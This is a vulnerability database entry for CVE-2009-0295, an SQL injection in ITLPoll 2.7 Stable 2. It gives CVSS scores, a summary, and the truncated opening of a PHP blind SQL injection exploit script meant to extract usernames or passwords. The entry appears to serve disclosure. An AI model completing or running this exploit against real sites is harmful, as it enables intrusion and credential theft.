6.8
CVSSv2

CVE-2009-0295

Published: 27/01/2009 Updated: 29/09/2017
CVSS v2 Base Score: 6.8 | Impact Score: 6.4 | Exploitability Score: 8.6
VMScore: 685
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in index.php in Information Technology Light Poll Information (ITLPoll) 2.7 Stable 2, when magic_quotes_gpc is disabled, allows remote malicious users to execute arbitrary SQL commands via the id parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

itlpoll itpoll 2.7

Exploits

<?php function usage () { echo "\nITLPoll v27 Stable2 Blind SQL Injection Exploit" "\n[☢] Usage : /itlpollphp hostname path <username or password>" "\n[☢] Ex : /itlpollphp localhost /itlpoll password" "\n\n"; exit (); } function query ($func, $chr, $pos) { //replace 1' with a valid poll ...